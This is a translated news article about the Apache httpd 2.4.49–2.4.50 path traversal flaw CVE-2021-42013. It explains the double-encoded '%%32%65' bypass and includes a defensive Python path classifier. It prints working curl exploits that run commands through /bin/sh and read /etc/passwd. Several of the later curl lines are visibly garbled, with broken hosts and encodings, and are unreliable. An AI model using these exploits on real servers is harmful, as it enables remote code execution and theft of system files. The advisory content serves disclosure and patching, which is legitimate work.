Another vulnerability in Apache httpd allowing access outside the site root directory

A new attack vector has been identified in the Apache http server that remained unfixed in update 2.4.50 and allows access to files located outside the site root directory. In addition, researchers found a method which, under certain non-standard settings, allows not only reading system files but also remotely executing code on the server. The problem affects only releases 2.4.49 and 2.4.50; earlier versions are not affected. To eliminate the new vulnerability, Apache httpd 2.4.51 was promptly released.

At its core, the new problem (CVE-2021-42013) is identical to the original vulnerability (CVE-2021-41773) in 2.4.49; the only difference is a different encoding of the ".." characters. Specifically, release 2.4.50 blocked the use of the "%2e" sequence to encode a dot, but the possibility of double encoding was missed: when the sequence "%%32%65" was specified, the server decoded it to "%2e" and then to ".", i.e. the "../" characters for moving to the parent directory could be encoded as ".%%32%65/".
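As an added illustration (not code from the original article or from the Apache project), the following Python models the two-pass percent-decoding described above and labels request paths that climb above the document root, reporting at which decoding pass the traversal first appears. The sample request paths are constructed for the demonstration.

```python
from urllib.parse import unquote

# Constructed sample request targets (not real traffic). The first uses the
# single-encoded dot blocked in 2.4.50, the second the double-encoded form
# from CVE-2021-42013, the third is benign.
SAMPLE_REQUESTS = [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd",
    "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/bin/sh",
    "/cgi-bin/test.cgi?user=a%2eb",
]


def decode_passes(path: str, passes: int = 2) -> list:
    """Return the path after each successive percent-decoding pass.

    Models the gap described in the article: one decode turns '%%32%65'
    into '%2e' (no '.' visible yet), a second decode turns it into '.'.
    """
    out = []
    for _ in range(passes):
        new = unquote(path)
        out.append(new)
        if new == path:      # nothing left to decode
            break
        path = new
    return out


def escapes_root(path: str) -> bool:
    """True if resolving '.' and '..' segments climbs above the root."""
    depth = 0
    for seg in path.split("?", 1)[0].split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def classify(path: str) -> str:
    """'traversal(pass=N)' if decoding pass N first escapes the root, else 'ok'."""
    for i, decoded in enumerate(decode_passes(path), start=1):
        if escapes_root(decoded):
            return f"traversal(pass={i})"
    return "ok"


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{classify(req):18} {req}")
```

A request that only becomes a traversal at pass 2 is exactly the case that 2.4.50's single-decode check did not catch.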

As for exploiting the vulnerability for code execution, this is possible if mod_cgi is enabled and a base path is used in which execution of CGI scripts is allowed (for example, if the ScriptAlias directive is enabled or the ExecCGI flag is specified in the Options directive). A mandatory requirement for a successful attack is that the Apache configuration explicitly grants access to a directory containing executable files, such as /bin, or to the file system root "/". Since such access is usually not granted, the code execution attack has little applicability to real systems.

At the same time, the attack for obtaining the contents of arbitrary system files and the source text of web scripts readable by the user under which the http server runs remains relevant. To carry out this attack, it is enough for the site to have a directory configured using the "Alias" or "ScriptAlias" directives (DocumentRoot alone is not enough), such as "cgi-bin".

An exploit example that allows running the "id" utility on the server:

    curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
    uid=1(daemon) gid=1(daemon) groups=1(daemon)

An exploit example that allows displaying the contents of /etc/passwd and one of the web scripts (to output a script's source code, a directory defined via the "Alias" directive, in which script execution is not allowed, must be specified as the base directory):

    curl 'http://192.168.0.1 .32/cgi-bin/.%%65%32/.%%65%32/.%%65%32/.%%65%32/. %65%192.168.0.1/etc/passwd'
    curl 'http: //32/aliaseddir/.%%65%32/.%%65%32/.%%65%32/.%%65%32/. %%65%2/usr/local/apacheXNUMX/cgi -bin/test.cgi'

The problem mainly affects continuously updated distributions such as Fedora, Arch Linux and Gentoo, as well as FreeBSD ports. Packages in the stable branches of the conservative server distributions Debian, RHEL, Ubuntu and SUSE are not affected by the vulnerability. The problem does not occur if access to directories is explicitly denied using the "Require all denied" setting.

Source: opennet.ru
